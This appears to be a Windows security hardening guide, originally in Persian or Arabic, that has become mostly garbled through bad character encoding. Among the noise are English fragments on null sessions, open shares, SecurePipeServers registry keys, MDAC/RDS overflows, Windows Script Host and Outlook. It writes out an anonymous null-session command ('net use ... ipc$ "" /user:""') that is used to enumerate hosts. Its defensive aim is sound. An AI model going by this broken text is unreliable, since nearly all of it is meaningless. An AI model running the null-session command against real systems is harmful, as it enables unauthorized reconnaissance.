S @ d * 0, U) 4 * GX) 5 - Y I5 _ SPC)Password % 'V < ? # $l ' 2 3@ ] I5 0, 5 - Y _ R4Level password share "), ) ? ^P NT ? @ ) ] sp4 $pqqq $_,< -,< SL XP Baseline Security Advisor S @ ? & W L3 : R4SMB 0, 5 l '%# ) 0, 5 B . ? & "), ) ? ) ? 5 M 9 ? $pqqs ) ("c A & R3 )- Y ( ,H $ R4 S @ " - Y Share net , 5 -,6 €" ? " , 6 ) ( E ) - " ? & NT $pqqq $XP 0 $l ' <+ ^P 6' B5# 7 !89 " , pqqs ) 1$ b3 n 9 " ) 6@ ]Net Share/ $ 0_ 5 - Y 0 -, < K ' j $ <+ <+ T 5! ) ^P 6( E ],< 7 !89 S a ‰8 - Y " 7c ) 7 < "), ) <+ W 3 <+ … )% ' ^ P $ : u !89 1 2 6( E " %P H$ F) 1 ) I 5 0_ < ( E " ? 
u 1/ + 6@C 8 <+ 7 ?, ("c 2 W L3 L 7 u u $-,6 $ I - .… : " ) - 3•… 3 6" E MR / P !& DY/ ) -,< - ) 6 ,1'XP "), ) < ,1' V < ? 5 TG' g - .… "), )XP V < "), ) a 6" E 6* , N ) 6% ' " 6 - .…NTFS <+ ^P e 'j 4 6" E "), )…NT "), ) ) pqqq "), ) $XP S L " % P H ] SP1 " E $_ "7 L Everyone 7 L ) Control Full0, < "), )…XP ? @ ) SP1 " E -, < SL Everyone ) $ 7 L Read0,< "), )…xp ( e 'j 4 7 L Sharedocs < User s/ Documents and settings/All C: /Documents " E ] _ Everyone 7 L ) Full Control0,< d * H + Open Share " GX) I5 + " ? "), ) GX) # 0_, < I5 $ F 5 ?N ) 25 $?N SMB 6* 5 6 <+ ^P R4 S @ ^ - Y % H ?@ : d * 3 ], < File Sharing %K ^ Gibson Research Corporation " ? & " 6 N 4 SB g bP 2 I5 ) R4 S @ 0 5 ' j 4 6& a 5 - Y …Nessus0 ) - " - Y I5 - ) -,< ( N $?N j 4 & a …Winfingerprint N 4 aWin32 Host/Network Enumeration A A : + A! A". /A 0(12A 3&Logon Anonymouse 9A I 5 G?" \N( Anonymouse Logon R4 S @ null Session0 K5 TG'$ b3 n 9 " ) " $ " - Y From Command Line Prompt: C:/>net use// ipaddress/ipc$""/user:"" < +P TL ? G ) -,<anonymouse P ! & Null $l ' -, < 'N I System error 5 F " U4 # ' F Ipaddress d * ?@ ( ] user/:” )_ hidden interprocess communications E ] H $l ' R 4 S @ : e G & @ IPC$ E ;! $l ' P 4 $l ' )- F) (, ! -, 6, 2 (E F " U4 # $ 0_ n. I 5 ("c " E 0 < ,6 * =GX 2 % R 4 S @ -, 6, ]% P Hj * -, < 'G Winfingerpirnt d * $+ A R 6 &'( 1 j 5 .Y " 0 ) Nessus ) , 63 & _Null Session0 5 - Y $ I5 ? A $ <- : A A A + A! A ". /A 0(12A 3& NT NTRK)(Resource ( regdump. K F % ' % <$ ' ) # n 9" "), ) ? & NT h @" ? E b3 + & : XP % -)8! 0, 5 http://www. Afentis. Com/top20 0 5 - Y & _ ] F #P< ) 6& K<@ I5 $ 6 ! ". /0(123&RPC ] ' ) # Secutity Analyzer I 5 A) 2 h @ n 9" ? l' 9 Microsoft Baseline $l ' 0 -M2A " - Y 0 - K $ R4 S @ d * http://www. Microsoft. Com/technet/security/tools/Tools/MBSAhom. Asp0 5 ! " ' 456 123& DY/ - .NETBIOSa bP 785/ % - Y ^ - ) pqqq $NT ) $ B 3 Patch-cheking , hotfix ( 2 % H$ 6" E TG' g 7 L I "), ) ? & $l ' & n 9" h 7 , , j6 I5 ,G 6 #6 " ? : 2 a 5 5 ?@ " - Y ) X # sharing ? 
5 T G' g 0,< CE ) {† ${Š "), ) ? , * ? G User-Level share access control 7 U) 4 L $, < NT "), ) Dmain " 0, 6% 'V < 0 0 ) FTP n 9 " ? # $sharing " - Y C ' ,6 3 sharing $S ?@ N n 9 " b' -,< <R V < &1 P !& z 0, K5 , 1' 6 , 1'? ? & 7 ) X7 2 , 0, 6 ( E " E ) -,< , K ? 0 #4 sharing ? 5 T G' g ) HTTP R4 7 + $S ? & , $ < +P " - Y I5 Sharing ), . C ' $7 ) X 7 )(E ,1' : 0 <R V < h @ sharing ?# ? ),. 0_,< ("c R 1$ ?@ " $ E < $ DNS F) , -, < K u S X j &' I 5 E u a 5 - Y " : : 2 6 !89 $ 1 2 6T 5! " % PHBackup 7 " ?# $7 ) X Restore " ? ] ,E ?# ] 0 5 ip # -, < ' 0,< < F) ? @ _ !89 + "), ) NT "), ) F ? 5 Restore ) $j F i ) $ Backup - . 4.0 F ? 5 Restore ) j ) $ Backup - . F ? 5 Restore ) j ) $ Backup - . pqqq "), ) ) XP "), ) pqqs "), ) "), ) 7 L , " Null sessions " # & K6 2 NT Domain Controllers $, -, < , 0 Windows NT Domain pqqq "), ) " % P H 6* ,63 3" 7 9P #4 I5 pqqs|pqqq "), ) ?# ] -,< Z F P ) 1/ b 2#5 I !89 ?& ? ,< < F) I 2 F Restrict Anonymouse 9 $ pqqq "), ) 6 $ • " - Y $_ , 5 5 1 ) j6 6% 4) 6 # h ), . T 5! a 5 - Y " 7c " 5 $ , I5 0 MR / ,6 3 ) 7 !89 R3 null session " ? : $ ! 5E Anonymouse ? "), ) - Y ?5F T@ -, % / - 0, - Y pqqsRestrict Anonymouse , $ 6 ' 7 !89 K ),. T5! NT Restrict Anonymouse "), ) F , " - Y - . pqqq F a 5 - Y " , Restrict Anonymouse 2 #< ;! F Domain 0 6, B "), ) ? % bP 0, DY/ - . 6" E ) $Service Pack 3 E $l ', , " ()&17 SL " u : E u ] ,E " ?# $7 ) X 7 " ) 7 $ " ? -,<restore : ) E -,<Backup ("c R1$ 0, < < 2 "), ) I5 / )NT 4.0 E 0, < 2t5: $ 6T5! " %PH !89 + 3 u( E " %P H 3 !89 $ 1 2 ?@ " $ a 5 - Y 2#5 Trust pqqq "), ) E K I 5 Restrict Anonymouse 1 " ? , $ K " T#< E i NT 4.0 "), ) E ? 5 Resroe ) $j ) $ Backup - . pqqq "), ) E•? 5 Restore ) j ) $ Backup - . " ' F) ? @ _ ) XP "), ) E ? 5 Restore ) j ) $ Backup - . pqqs "), ) n 9" a K5 E TP ), . T 5! E ,B E I5 I 5 a #P< " %/ ), . 
$ #P<
Create the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
Description: REG_SZ
Value: Registry server
- " " F) K 6) j 4 7 5 I $"), ) SL ? " 0, 5 $l ', B e 'Access Control List ] , 6) " %/ $ a K5 )? d* 3 $l ', B ,< B E ),. T5! E 6" E ) 7 " , Backup Operators ) 6" E ) Regedt32.exe ] I5 , B E E F a, B 2 ' F E F
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Edit n 9 " Add Key a " Enter the following values:
Key Name: SecurePipeServers
Class: REG_SZ
a, B 2 ' F E F - H _ pqqq "), ) TP _ regedit.exe ) & O* z 0,6
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers
Edit n 9 " Add Key & O* a " z Enter the following values:
Key Name: winreg
Class: REG_SZ
a,B 2 ' F E F
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
Edit n 9 " Add Key & O* a " z Enter the following values:
Value Name: Description
Data Type: REG_SZ
String: Registry server
a, B 2 ' F E F
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
0 Permissions " E Z :! ) Security ) B $ winreg O * I5 " E )? 6-) ? 1/ 2 0 5 'X ( E 7 5 I ?, < T G' I 5 ) z 3 Registry Editor 0, K5 ", - E " $-,< F) 0 5 E # 1 u ,LH -,< - < B / 2 3@ ? ^P I "E ? ) i $,< < ), . T 5! a-,< , K ) - " 6U ) : " ("c 6" E " 3 i: ? , B ? @? 5 d* AllowedPaths ^ ] 5 = Machine G 2 $ 0,< E < TP, $ account name U ) 1 Z F T/ winreg T5! (,! ,B ),. T5! P F7 [ , Directory Replicator ) service printer Spooler : ? )&' # ^ I 5 "), ) , # 4 3 6, B )$ ), . 
) Users a_
Bypass the access restriction:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths

Value: Machine
Value Type: REG_MULTI_SZ - Multi string
Default Data:
System\CurrentControlSet\Control\ProductOptions
System\CurrentControlSet\Control\Print\Printers
System\CurrentControlSet\Services\Eventlog
Software\Microsoft\Windows NT\CurrentVersion
System\CurrentControlSet\Services\Replicator
Valid Range: (A valid path to a location in the registry)
Description: Allow machines access to listed locations in the registry provided that no explicit access restrictions exist for that location.

Value: Users
Value Type: REG_MULTI_SZ - Multi string
Default Data: (none)
Valid Range: (A valid path to a location in the registry)
Description: Allow users access to listed locations in the registry provided that no explicit access restrictions exist for that location.

DY/ - .RPC bP %K % SL : 2 A) 2 Windows Update ? 5 TG' g #B 5! ^ P Patch b I ,G ), . T 5! 6MBSA -, < K 6A) : )RPC h @ " - Y http://www.ntbugtrag.com/dcomrpc.asp ("c 0, < , Y , - . : ),. T5! #B 5!RPC 2 U4 ) (E # ?# Patch B 5! $ "), ) U ) g 0 5 T 5! bP ) ? 5 TG' g " 3 I B 67 7 ) 4 ? ' <, 0 F) 2 # 2 " ;! , u, ? @ $ #B 5! . $, < ,< : - < 3 2 F) ) $ 4 " ? 59 " ? 5 RPC ^ ^ Š{s ) ‹‹Š ) ws{ ) wsŠ ‹‹Š ) wsŠ$ws}$ws†UDP0 5 V8 ) "), ) $ R4 S @ : a 5 - Y 67 " : !89 + E 4 ] "), )TCP 67 4) _ ),. T5! - . K<@ I -, < - <Windows Remote Access Services " ? Security Bulletin Service & Hotfix Microsofts editor windows server 2003 Registry) XP "), ) " - Y - . access: Remotely accessible registry paths and subpaths Network Server 2003 Security Guide windows ! " % &# 08 Microsoft Data Access Components (MDAC) MDAC S @^ !89 " - Y R4 MDAC ?5F bP 0 " , -,< ' ) 6, " $l '785/ 0, 5 - Y _O * 7 a 5 - < "2 E B % !) " H # $"), ) : ? ! E % <$ 3 2 6* " ,G ,G 785/ ? ), Z F] 6 # ) " - Y RDS I ] 5 ,H 6 „1# " 3 M ,6 1 ) ,< < F $ R4 S @ ,G % c , -,< K 7c L. 
, ,F %K F) ) _ overflow buffer - 9 *5 F 5 $ 0 ", RDS 7 5B " MDAC $ " S Remote Data Services 5 , H * H ) - " ? 0, 5 Z F $ , 7" $ =GX ) 6" E - 5 78# ) 6=GX 0_ ?@ B F * ] s) Š MS Access !89 6 GX) 2 3@ 6 T 3" 6 R4 S @ $_ 6 ' ,G 7, , " j ) -,< 3 < % 5 ,H R4 S @ B % c " $ 6 0,< Microsoft jet " ) j &' ] I 5 ("c 7 , )- B . 7 L =GX - 5 l '=GX Microsoft jet Database Database Engine " -, < h PH 6 F) 0 S : $l ' -,< K ) , # 4 (,! )- # (N F ) 6, " 0, -, ! 785/ l '=GX " - Y 3 785/ " # Buffer Oveflow ? ?5F (E %1 , $ : - 5< MDAC0,< P 3]21 MSO3-033 * _ 5 R4 S @ : 2 0 MDAC -, < - < ?@ $pqqs "), ) ' ) # $() * "), ) IIS Q NT 6 ) T)J) $ RDS ) j< l' 6* =GX SQL " MDAC 0, < 6* ] SP2$_ Q$ < l ' R4 S @ : + ‹) q $,< -,< SL w)Š ) pqqq O), ) 0,< XP - 5 ] pqqqU '@? @ ) * SQL Server 7 ? @ ) ?@ ) , 56SPI $_ K6 -, < SL , G ) Server 2000 -,6 N 560, 5 - Y "), ) ! ". /0(123& "), ) ) % ' F) W L3 NT 4.0 - 5 IIS SL # ) * $,< -,< masdcs. Dll” % '] < ( E ("c C 5! l 'files\Common files\System\msadc\msacds.dll c:\program h @ # 0_, < 7) Y ) " , #4 F 2#5 l 'h @ $ patching 2 ( N $,< l '% '% < I % ! 6 ) 5 ,H 7 K &F " 6 @ 6 &'( I5 0 < , 6 3 F) 7 0 H$ : $ (E ? HS @),, e G $-,< - < ("c 3 " ? ( : W (N W L3 MDAC- 5< R4 S @ ^ 2 0 5 - Y L3 ("c ( ,H F b < S )(E R4 S @d * 2< ) 0 -,< i 3 -, < SL 6 &' 456 123& : RDS $Jet " ? ? @ h @http://www.wiretrip.net/rfp/txt/rfp9907.txt & DY/) I5 & " ! " %& 6=GX ' ) # Windows update $l '? # 0 5 - Y $ 0 5 ,6 3 6 &'( MS03-033 21 " ? - .?@ R4 S @ : 2 % _ B ) i.L - . ) ' ) # P 3]2 1 2, 0 5 - Y : 2 http://support .microsoft. come/support/kb/articles/q184/3/72.asp http://www.microsoft.com/technet/security/bulletin/ms99-004.asp http://www.microsoft.com/technet/security/bulletin/ms99-025.asp http://www.microsoft.com/security_bulletins/ms03-033.asp http://www.microsoft.com/technet/treeview/default.asp?url=/technet /security/bulletin/MS03-033.asp http://support.microsoft.com/default,aspx?scid= kb;en-us;82378 ? ver * $l ' 2 3@ 0 =GX 3 $†$p MDAC Z I MDAC * !89 6 F MDAC bP ! ) h @ n 9" ? 
http://msdn.microsoft.com/library/default.asp?url=download/list/dat aaccess.asp " ? 0 5 : 2 0 5 ' ) -,6 windows update - Y & ! " % &# 5, Scripting Host(WSH Windows) WSH ) 4 # ) #B 5! j &' I 5 6* „ 1 # 0_ - - 5 6, " - Y N 4 -, , 6 # U l ' 6% $"), ) 4] , 5 -,<desktop 0_ 5/ ) K f4 * F $% ' I ], „1# $ K "), ) % !VSH ?# $ ?@ " g@], F -,< K ? G ) K "), ) 7 B 5! ? n 9" C 5 , - 56{† "), ) b "), )VBScript P 21 ) ) ) F " $l ' „ 1 # 0,< ? - 5 IE ') # Z F 4 6' 4 # ) - ? 5 ,B ) n 9" ) 4 # % ' 0_ # ) #1 ZF -,< < VBScrip 0, b " 3O * M 6 7 % 3 % '\ vbs,. Vbe,js, .jse0) 0wsf 6 '$ B ;! I 5 $, , & WSH O G 0 ) X ! B % !$ ILOVEYOU , ] J)WSH( ) ) - ‰ : " U4 6 K6( F ?# $S T)J) # <R ? 1 _ ) l '( 2 , 0, - 5 - Y ? G $jscript 6" E i: $() * WSH K ) # - 56 ) #B 5! j &' I ) F " $l ' „ 1 # 0, < P IE * „ 1 # 0_ WSH - 4 -, ) Z F U) n 9" -,< K ? ! ?@ " g@ ] , E $% ' b „1# $ 6VBScript 2 1 ) ) "), ) , - 56{† "), ) N I ], 0_ # ) #1 - 56 ') # 5/ ) K f4 * K "), ) % ! $"), ) ) # 6 4 ?# $ - 6, " - Y ZF J)WSh ( ) X ! B % ! $ILOVEYOU ] -,< < , VBScript 7 b M ,6 % I 0, , 3 c ‰ : ?@ " U 4 3 O * WSH % '\ & " wsf.vbs,.vbe,js,jse OG 0 6 '$ ) $() * "), )NT "), ) 2 3@ 6 <R ? 1 K6( F ? # $S ) i: - TJ) ) l '( _ 0, 2 , 0, - 5 - Y # ? ! Jscript 6" E +, WSH n 9 " * B ;! ) 7 $IE ) , $_, G f4 * ] SL {Š ) ME,98,98SE,2000,XP ) WSH,2003 0 ' 0 Windows Scrpt SL e 'j 4 7 h @ " ? Windows Download Script0 5 - Y + ! ". /0(123& -,< SL IE5.5 * - 56 NT ) {Š "), ) ? @ ) K6 • 0 -,< SL pqqs ) XP $ME ${† "), ) ? @ ) 0 WSH # W L3 0 $, <P -, < T ("c ("c : K6 WSH A) " - Y DY/ I : 2 ?@ K6 ' ) SL 0 < ,6 3 )(E #6 • ) HS @e G -,< SL ? @ ) " $,< ,6 3 - < ? @ ,G j* K6 - Y $?@ % ! " %& $ 456 123& , 7 B 5! ) 6 " - Y , " WSH 0,< , 6 3 F T#< 3 $l '% l' 6 ? 2 & * BWSH - < # 2 4 MR/ ) ? 5 TG' g 7 ("c , )- „ 1 # WSH ? 59 T G' g ? ) MR / $ 6 bP %K )- ) " ,G ) 785/ % WSH 5 " ) ?@ "), ) % ! ?@ DY/ #B 5! 
" I # 3 3 * $ N ?), ) $ ] 40 5 TG' g l '% 4$ 0_,< Noscript.exe b 8 $ WSH 6h8 % '( Wscript.exe ) Cscript.exe 6, BShell\Open2\ Command E 6 6 ^ -,< K $ Sysmantec U ) # 5 SL F W L3 I ("c ) Shell/Open/Command $ N 4 $S 0, < , 6 3 ( E $? @ Noscript.exea K5 TP Y 2 , 0, 5 ) P Q M , 6 " I' " Noscript.exe $ Norton Script Disabler/Enabler ) TG'] WSH GX) 2 3@ Z F " U 4• F #B 5! W 6A" L3 ("c 4Desktop K6% '] # wsf0.vbs,vbe,js,jse, $ OG 6% '] - ?# ? 6 -, < ( E # $-, < < N 4) - j 5 6 '?@ ? 5 TG' g , DY/ $ 5 %K I 6% ' "), ) e 'j 4 , #4)75I j 5 6 2 6% ' u . 3 , ) " ? 59 " U 4 , '? - .0 EXE u_ ) COM ) _ 0, < , 6 3 Z F ? @ B '8 ("c ? 59 0 5 6 '$" E F% # F "), ) e 'j 4 FWSH ?,< TG'(,! W L3 # WSH ( E ) 7 , , ? 5 m .1 6% ' ^ P "), ) K F ) / % '?, < T G'" U 4 ,6 3 - _ < _(WSH ^ OG • ' ] Noscript 0 ) T G' g " %/ Symantec ) T G'? # $_TG' g u I ? g MR/ 6 # % '$ # $S 2, 0,< K6 # 0 -, < T "E ? 0 5 d* 0, 5 •* T /2 ! ) ), . $, # WSH ? 6 6 ! $2 ?@ F W L3 ("c 5L S @), , G I 2, 0 < , 6 3 @? ! Z F ?# ? `56$ ) / % '( csript.exe # 0 wscript.exe )= G Cscript.exe myscript.vbs ? 5 TG' g ) MR/ - . : 7 !89 S WSH I h @" ? http//www.symantec.com/avcenter/venc/data/win.script.hosting.html 0 5 - Y ,` :&" -, < ( N U ) ) ? 5 TG' g ^P I 3 $l ' 6 &'( O * 6% ' I ] 0 6 # ( E WSH0, 5 b -, < K 6( $S 6% ) / K5 X , < .scr.vbs,js,jse, wsf,bat, Script Blocking 4gatways U ) SL $? & ) ? , 6 WSH ? -)8! ] ("c @ $ 2, _ 4" - Y # ) #1 6 ) 6h ) )exe pif and 8Q _Norton AntiVirus 2001 ? # $, G C P 6h) ) % ? & , K DY/ a; [ ,Z 2(2 + WSH " ? QS $ ?@ * 2 3@ 0 h @Windows Script Download0 5 'Z 7 G', $ 3 ? 1 ' + , 2R NTFS 6" E " NTFS h wscript.exe ) jscript.exe % H ? i: = G " K6-) )? I ? ^P 9 - 56account V < % ' ) # % ' ) " 0 5 - Y $"), ) PG e 'j 4 7 5 I $ < 6% ') 6 Full Control -) $‰8 W L3 l 'e ) Everyone $, < ? ? 5 $S 2, 0 < ("c " E 'j 4 7 5 I 0, < $ 6 0, , + : uNTFS 6" E TP 5 % < ' I 25 0, < 5 S K6-) )? 
) X " %/ $ ) 6% 'MR / ) T wscript.exe ) cscript.exe MR/ % < 6 ,1') 6% ' " I <R V < <R NTFS e 'j 4 7 5 I $ < 7 6 % ' ) ^P a K5 25 , LH B' ) O * $My Computer ? 5 TG'• $ 0,< _% '$ $ u , LH ] -,< O * 0 K5 d* 9 -) $?, 3] " E L3 Y. O* tab 7 (,! Deny ) ?# Allow % ' Property $ ?& % ,P % ' I ) $ NTFS convert drive_letter:/fs:ntfs 6" E NTFSah @ " ? bP \ $Pemission j* 0, 5 # Security j * F) ?@ ) ^P .Y F) ?@ " Property Y. ? 5 TG'• < ^ Account $d I < 5 -,6 " ? I - . W L3 % ' ) d* 6" E • & 0 K5 _000 ) 2 < Security $% ' ^ NTFS 0 • -, , #4 $ Convert ] 0 5 - Y 7 !89 S I5 $ http//www.microsoft.com/windows2000/en/server/iis/htm/core/iidfp sc.htm 0 5 - Y ! " % &# 0, Outlook Express, Outlook Microsoft Outlook 7 !89 $l ' 0 ') # $ 6h 5 b $_U '@ -,< K , ?# $ # ) #1 ^P 7 0, 5 Exchange ) K 4" K $ K6 0, < "2 -, < K 0_ - ? &56 ‰: Outlook98 y SL 7 P # ) #1 0 I 5 6 BH ) - $ F !" V 8Q 0, < , 6 3 C A 0 ' ,6 3 3W 3 6% 4 H I W L3 ) ?N IE ^ - Y F 6* %/ - " 6 J) 0 - ,E - Y 9 ) U '@$ , ) T) , ) 1 ) < ,6 3 TP N P ?@ 6 - Y * ?), ] $: , " T#< ") =GX [ 7 F) 7 G ) - ), . ?@ " - Y Z ") B 5! b. , N : <2 C G:H 6j1 $2t5: ) 25 S * " - Y 0, < , 6 3 6 '& F =GX $W 3 L ! I $ 6 &'( SL ?# _ c $l ' # ) 3 $ ) rendenring 0, 5 6 ) H ? 5F * ?@ - 56 , 1 6 '$( '784 2 , G 7c L. ! ] 56${Š "), ) 'G ? " " ] ' ) # Outlook 98 IE - Y a? `56 P Q 4 -, 6 U ) =! > ?@ SL ? ! 4 " HTML 2 -)8! Server V < ? " $7 H8 IE - Yc j* 5 ? ! ) L*< 1 ) 7 ,3 K Backoffice „ 1 # " - Y ? # $"), ) % ! $ U) *] 6 c L. n YBIE ) OE I 4 -, 5/ 0 ) Express Outlook ] _OE Outlook K ! 5E " ? " ) 6 1G'Oulook " 4 l), F # ) #1 bP b 2, 5 $ 6 &'( 4 6 '& $_ ' ) # ("c 78 % , - 4$ ') # BH M ,6 " # 0 < ,6 3 T # ) #1 6 ) 7 !89 , , \X 2 )- $ # ) #1 6 0,< < TP O * &'( P 6h) ) 6@ & ? 5 About I n 9 " Help l' f4 " Outlook ? ! Z 0 , :3 ) 7 , , ") # ) #1 6 -, " * 2K4 0 ' 6 @ 6* 6N F e 'j 4 SL ] 0 ,G - 5< " ? ?) ' 6 BH 3" $IE ) F " U4 $IE TG' $ >! ? ! 
) ,< ,6 * SL Outlooka U) l ' &'( 6 K U '@- $?@ SL W L 3 _ -,< K "), )OE 0 B '8 0, < - 6T / " 5 - 56 -,< K " , ,F * -,< E +, 6* * G 6, ) 6( $() * OE e ) !89 6) $ , $ ,F ) 7 5L 6* Outlook9 • Outlook97 • _ < Y & Outlook2002 _ < & ? 5 TG' About * pqqq " a 5 - Y " ] Outlook 2000 • ) Outlook10 ?@ ] OutlookXP • n 9 " Help - 5< " ? OE 2K4 ! Y & Outlook9 ?@ 6* Patch + 0 ' 6@$ " ? !89 -http//www.microsoft.com/windows/oe/. -http//www.microsoft.com/office/ outlook./ + ! ". /0(123& F " U4 ] IE : ) 2 _ -,< SL 0, (N ) ) SL "), ) % ! 6 ?@ - 56 Outlook Express " * IE $U '@ 6 SL * " ,6 3 ,< ! 5E SL " - Y ( ,H ? Outlook -, < K ( N (,! 7 0, < H, , e G ?@ ) K6 0 -,< SL & 0 < ,6 3 HS @e G 0 5 OE )Outlook 6* 3W 3 $ 9 5 %K 75 I & A ! (,! # ) -,< SL 0 < ! " %& 456 123& "2 a (E F 7 , , j6 ) l ' R4 S @ % YB* 7 B 5! # Outlook + 6 " Outlokk Express e 'j 4 7 5 I ) SL Outlook ) Outlook Express 7 5 I W L3 4 DY/ I 5 ("c W L3 2 0, : 2 0 =GX 2t 5: -,< SL * ? (N " ) (E a SL ) http//windowsupdate.microsoft.com/ . ] Critecal C L 3 -,< K _ n 9 " Layout 0 6 , & O* 0_Preview] 6 'Show Preview Pene bP " 5 Security Zone] ) O * Options & ? 5 TG' g n 9" a,< : I " View 5#. 2 • 0 # ) #1 High I <b 2 " $7 !89 " 6 5 1 ) % 4 ? 5 T G' g • 0 < ' ? 6Patch / 7 5I ? 5 & Tools - Y • ) A" @ ) X? 25 , @ ' ^ P , # ) #1 6 " •0 % ! " - Y K ?@ j : ("c ? F $, < 2t5: ?@ -, T +P 6h) ) W L3 / $ 5 5X % ' ("c ' • ? " $?@ ? 5 TG'" %P H) , 0 <( E " g ] , 1' ? ! ? , 6h) ) " 6% ' " ("c $ 5 5 X % ' " ,G b ' 5 5X ' $l 'h @ ] 0 5 - 3•_MY Documents 6% 'S #Y ] 5 O* N _ ("c 0 < 3 # ) #1 XSL % <, 0,6 ' ) # " - Y macro Disable I 6% ' / ' F # 2 ,< % ' * 6, • ("c # High , & ) - < HS @),, e G 7c L. : 6% '? 5 T G'" • - 56 5 5 X ) DOC • ? " $_Word I] TG' 0 < ' ` :&" 6 !89 DY/ W L3 6 0, 5 DY/ " ? 59 " K $O * (N (N 7 B 5! $h) ) @ ' 4 h) ) @ ' 4 ) , ,F 6% '? 5 V8 " ? 59 4 0, < ) 6 -,6 # ) #1 6 ? , ?" h) h @" ? 
6 U) $O * Œ # ) @ 6 NY67 6 ) (E 5 j 4) @ ) 6h) ) " ) 5 5X @ 7 L 6 " - Y " %P H h) ) , Q% Q $7 , , 2 , ,F % 0, 6 )- 6 &'( L %H , / 6h) ) , , " %P H $Œ # n 9 " 6( @ ) 6h) ) $ 6( 6 I5 - ? @b 7 # $h) ) 6, I 5 0, BH $ P DY/ 6 & $ " ,G 0, 6% '7 L +F )O * , % < (N # ) #1Preview $ I 5 0, $ ' http://www.microsoft.com/security/protect/antivirus.asp0 5 - Y A ) # QS $Outlook + Express OutlookG Outlook Express j &'M,6 ] $l ' * " 2 3@ ' I 5 0_ c g] , 1' ?@ , ? G 6h) ) " " / ) N 6% ' ' 7 G', ' 3 2 _ O* 6% 'S #Y] F \) < : 5 O* N ) DOC 0,6 ' ) # macro Disable ) 6% ' / 0 - < " - Y ' ,< % ' * 6, • ("c # High , & F # 2 HS @),, e G 7c L. < - 56 5 5 X % '? 5 T G'" • # ) #1 XSL % <, • ? " 0_ ("c 0 < 9 l 'h @] 0 5 - 3•My Documents ,G b 5 5X 3 ?1 5 ) 6 BH ("c 5 X % ' , 1'? " 'Z _Word I] T G' 0 < ' ` 6 DY/ W L3 !89 6 , 5 (N (N 7 B 5! h) ) @ ' 4 h) ) @ ' 4 ) , ,F 6% '? 5 V8 " ? 59 4 0, < $ ) -,6 6, I 5 0, BH 6 # h) ) K $O * DY/ " ? 59 " P ? @b U) ? " $O * @ 6 6 # ) #1 6 ? , h) ) I # +F , :&" 6 &'( ) 6h) ) $ 6( NY67 6 6 ) (E 6 ) 6h) ) " I 7 L 5 j 4) , , " %PH $ ) 55X @ Q 7 , , 2 , ,F % 0, 6 )- Q% L %H , / 6h) ) " - Y " %P H h) ) n 9 " 6( @ I # @ )O * , % < DY/ 6 & 0 " ,G 0, 6% '7 0, A L (N # ) #1 $Preview . http://www.microsoft.com/security h @ " ? $ ' ) # 0 5 - Y /protect/antivirvirus.asp Outlook Express M, 6 ] 'Z " ? 7 G', $l ' " ? 59 * ' I 5 0_ c U '@ 6 )d * 7 L l' . 7 K &F " 6 @ I XP Security h @ " ? # 7 u ) Outlook ? 4 (N 5 ("c 0 5 - Y white paper Office # 2 $,< #P< ? , 0 < -, " Outlook ) X ) ("c " bP 7 5 I ) 6T5! " %P H I5 , ( N6 0 5 - Y Offece Product 0, 5 $XP U '@ * - < ) 5 ) 6 BH j &' http://www.microsoft.com/windows/oe h @ I5 0 5 - Y Updates page h @ " ? ^ QS $ 9 Outlook Express 3 ?1 2 3@ Outlook + " * 5< , \89 # ) #1 6 " ( N6 ^ \X $ 7 K &F <@ 0, 5 - Y Resource Kit Office Outlook Express U) 6 ) # ) #1 6 ? 5 Uninstall I N W 3 ( ,H ? $ ? "), ) 6* ) 0 5 ? ME Setup - Y 7 !89 , -, • Outlook SL 7 ? 
5 Add/Remove Program • Outlook ExpressSL 7 ) {† "), ) ) O * ) Windows " # ) " Outlook Express ) Outlook a 5 & " - Y Outlook ? 2 &Uninstall & ) Add/Remove Progtam ? # @ O * 0 5 6 ' ?@ MR/ ?# Outlook Express ? XP a 5 - Y • Outlook Express SL 7 ) pqqq "), ) ) " 6h @ " 9 7 B 5! , `4 F Outlook Express Version 5. X/6.0 * h @" , - Y , " pqqq "), ) ? 5 … - Y http://support.microsoft.com/default.aspx?scid=kbEN-Usq263837 0, 5 Outlook Express Version 5.x/6.0 * h @" , - Y $, " ME 5 ) {† "), ) ? … - Y http://support.microsoft.com/default.aspx?scid=kbEN-Usq256219 0, 5 R4 S @ : 2 5 Wimdows Peer to Peer File Sharing (P2P) 6 ' ?# 2 ) 0, < ' User mode I " , H- Y ' $ K, ) " ]- 2 l' 6 h -, " - 3• >' I 4 -, ? G? , 6- I N 6 #P< " % ' ' ? , ) SB g -,< K 7 < & ? " ) +" 0, 5 ) 6' )d* < 3 )V# $ 6% 'V < 2, U) ? N - Y Q " - Y H? , I5 l ' 6 code Source Napster b 6 9P T " \ 2 - Y _ /) 6 , 5 6 2 H U) 6 +" ) Download )Y \ 5 <2 I 3 ?1 7 L SB g l' 6 " I ! B B 512 U) ?# 1 &5 ) ,< d l ' R4 S @ : 6 n 9 " -, < 1P 0, 5 ( 7) Y -,< - < ^ P ) -, 0 E F 6- E F U) I &' 6% ' , )- ? 0, R V < 6% 'T )?@ download 2 , 7 5 „ 1# 2 LAN ,63 L ? 6 F 1 ), 5 ) 5 0 5 ' $ 6% 'T F) & WAN 6 H ,F , , ) S @ e G (E U) '/ < \ N 7 4" - Y K - 1% I l' \P < ?# W 3 6 P2P ) (E 6% < , 67 4 " X / I5 ?@ http wrappers " - Y " - Y ) E F ^P 0,< ( ,H ? " ?56 - Y e 'j 4 I ), . ("c 78 I ^P , @ ' <] -, I 0 ' , 6 3 -, 6 #P< 0 < ,6 3 % < I _-, Q 0, < ) 6 ' E F 0, 5 upload 2 , l ' 6 -, < T 5! 3 ? &56 : , . 2' T/ v 4 6 6 ? " i: multithread / ) j &' " - Y ? " 5 "E g DOS \ " 85/ ;! , ) _P2P -, U) 7 !89 23 , - 9 * F) 0 < <R V < ,F : < _… ) F) & ^ 6 &'( $ \X ] L $ 2 , #4 : _ % < P2P $ " ]& B'\ l '7 , , 0 ' =GX % 1 , ] #P< ),. H %K N` 6] : 2 0 ] 7c L. -, 6 K 6 n 9 " -,< K 6 \ 2 " ? , . 6 _ , <b . TP - Y )_ ) B' 0, 5 